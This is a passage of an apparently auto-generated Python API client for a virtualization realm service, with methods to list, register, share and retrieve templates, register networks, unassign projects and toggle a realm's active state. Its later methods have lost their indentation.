    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_template_registrations_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[MinimalTemplateRegistration], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict.
    local_var_params = locals()

    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_template_registrations" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `list_template_registrations`")  # noqa: E501

    collection_formats = {}

    # ``id`` fills the {id} placeholder in the request path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/registrations', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[MinimalTemplateRegistration]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_template_subscriptions(self, id, **kwargs):  # noqa: E501
    """List Template Subscriptions  # noqa: E501

    Returns a collection of the Template Subscriptions in the specified Virtualization Realm.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response.

    >>> thread = api.list_template_subscriptions(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[MinimalTemplateSubscription]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: ask the *_with_http_info variant for the
    # deserialized body only (status code and headers are dropped).
    return self.list_template_subscriptions_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def list_template_subscriptions_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Template Subscriptions  # noqa: E501

    Returns a collection of the Template Subscriptions in the specified Virtualization Realm.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_template_subscriptions_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[MinimalTemplateSubscription], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict.
    local_var_params = locals()

    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_template_subscriptions" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `list_template_subscriptions`")  # noqa: E501

    collection_formats = {}

    # ``id`` fills the {id} placeholder in the request path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/subscriptions', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[MinimalTemplateSubscription]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_unregistered_templates(self, id, **kwargs):  # noqa: E501
    """List Unregistered Templates  # noqa: E501

    Returns a collection of the unregistered, back-end Templates in the specified Virtualization Realm.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response.

    >>> thread = api.list_unregistered_templates(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: list[Cons3rtTemplateTagData]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: ask the *_with_http_info variant for the
    # deserialized body only (status code and headers are dropped).
    return self.list_unregistered_templates_with_http_info(
        id, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def list_unregistered_templates_with_http_info(self, id, **kwargs):  # noqa: E501
    """List Unregistered Templates  # noqa: E501

    Returns a collection of the unregistered, back-end Templates in the specified Virtualization Realm.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.list_unregistered_templates_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(list[Cons3rtTemplateTagData], status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict.
    local_var_params = locals()

    all_params = ['id']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_unregistered_templates" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `list_unregistered_templates`")  # noqa: E501

    collection_formats = {}

    # ``id`` fills the {id} placeholder in the request path.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/registrations/pending', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[Cons3rtTemplateTagData]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def register_network(self, id, network_identifier, **kwargs):  # noqa: E501
    """Register Network  # noqa: E501

    Adds an existing, back-end Network the specified Virtualization Realm.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the deserialized response.

    >>> thread = api.register_network(id, network_identifier, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param str network_identifier: Back-end network identifier (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: bool
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: ask the *_with_http_info variant for the
    # deserialized body only (status code and headers are dropped).
    return self.register_network_with_http_info(
        id, network_identifier,
        **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def register_network_with_http_info(self, id, network_identifier, **kwargs):  # noqa: E501
    """Register Network  # noqa: E501

    Adds an existing, back-end Network the specified Virtualization Realm.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.register_network_with_http_info(id, network_identifier, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param str network_identifier: Back-end network identifier (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw ``kwargs`` dict.
    local_var_params = locals()

    all_params = ['id', 'network_identifier']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge accepted ones into
    # local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method register_network" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                   local_var_params['id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `register_network`")  # noqa: E501
    # verify the required parameter 'network_identifier' is set
    if self.api_client.client_side_validation and ('network_identifier' not in local_var_params or  # noqa: E501
                                                   local_var_params['network_identifier'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `network_identifier` when calling `register_network`")  # noqa: E501

    collection_formats = {}

    # Both path placeholders are filled: {id} and {networkIdentifier}
    # (the snake_case parameter maps to the camelCase path token).
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501
    if 'network_identifier' in local_var_params:
        path_params['networkIdentifier'] = local_var_params['network_identifier']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/networks/{networkIdentifier}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='bool',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def register_template(self, id, **kwargs): # noqa: E501
"""Register Template # noqa: E501
Adds an existing back-end Template to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_template(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param InputRegisterTemplateObject input_register_template_object: The template registration data
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullTemplateRegistration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.register_template_with_http_info(id, **kwargs) # noqa: E501
def register_template_with_http_info(self, id, **kwargs): # noqa: E501
"""Register Template # noqa: E501
Adds an existing back-end Template to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.register_template_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param InputRegisterTemplateObject input_register_template_object: The template registration data
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullTemplateRegistration, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'input_register_template_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method register_template" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `register_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_register_template_object' in local_var_params:
body_params = local_var_params['input_register_template_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullTemplateRegistration', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_project(self, id, project_id, **kwargs): # noqa: E501
"""Unassign Project # noqa: E501
Revokes Project member access to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_project(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to unassign (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.remove_project_with_http_info(id, project_id, **kwargs) # noqa: E501
def remove_project_with_http_info(self, id, project_id, **kwargs): # noqa: E501
"""Unassign Project # noqa: E501
Revokes Project member access to the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_project_with_http_info(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to unassign (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'project_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_project" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `remove_project`") # noqa: E501
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `remove_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'project_id' in local_var_params and local_var_params['project_id'] is not None: # noqa: E501
query_params.append(('projectId', local_var_params['project_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/projects', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def retrieve_template_registration(self, id, registration_id, **kwargs): # noqa: E501
"""Retrieve Template Registration # noqa: E501
Returns a single Template Registration in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_template_registration(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullTemplateRegistration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.retrieve_template_registration_with_http_info(id, registration_id, **kwargs) # noqa: E501
def retrieve_template_registration_with_http_info(self, id, registration_id, **kwargs): # noqa: E501
"""Retrieve Template Registration # noqa: E501
Returns a single Template Registration in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retrieve_template_registration_with_http_info(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullTemplateRegistration, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method retrieve_template_registration" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `retrieve_template_registration`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `retrieve_template_registration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullTemplateRegistration', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def set_virtualization_realm_active(self, id, activate, **kwargs): # noqa: E501
"""Update State # noqa: E501
Updates the active State for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_virtualization_realm_active(id, activate, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool activate: Activate or deactivate virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_virtualization_realm_active_with_http_info(id, activate, **kwargs) # noqa: E501
def set_virtualization_realm_active_with_http_info(self, id, activate, **kwargs): # noqa: E501
"""Update State # noqa: E501
Updates the active State for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_virtualization_realm_active_with_http_info(id, activate, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param bool activate: Activate or deactivate virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'activate'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_virtualization_realm_active" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `set_virtualization_realm_active`") # noqa: E501
# verify the required parameter 'activate' is set
if self.api_client.client_side_validation and ('activate' not in local_var_params or # noqa: E501
local_var_params['activate'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `activate` when calling `set_virtualization_realm_active`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'activate' in local_var_params and local_var_params['activate'] is not None: # noqa: E501
query_params.append(('activate', local_var_params['activate'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/activate', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def share_template_registration(self, id, registration_id, target_realm_ids, **kwargs): # noqa: E501
"""Share Template # noqa: E501
Shares an existing Template Registration in the specified Virtualization Realm to the provided external Virtualization Realm(s). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.share_template_registration(id, registration_id, target_realm_ids, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param list[int] target_realm_ids: ID(s) of external virtualization realms to share template registration with (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.share_template_registration_with_http_info(id, registration_id, target_realm_ids, **kwargs) # noqa: E501
def share_template_registration_with_http_info(self, id, registration_id, target_realm_ids, **kwargs): # noqa: E501
"""Share Template # noqa: E501
Shares an existing Template Registration in the specified Virtualization Realm to the provided external Virtualization Realm(s). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.share_template_registration_with_http_info(id, registration_id, target_realm_ids, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param list[int] target_realm_ids: ID(s) of external virtualization realms to share template registration with (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id', 'target_realm_ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method share_template_registration" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `share_template_registration`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `share_template_registration`") # noqa: E501
# verify the required parameter 'target_realm_ids' is set
if self.api_client.client_side_validation and ('target_realm_ids' not in local_var_params or # noqa: E501
local_var_params['target_realm_ids'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `target_realm_ids` when calling `share_template_registration`") # noqa: E501
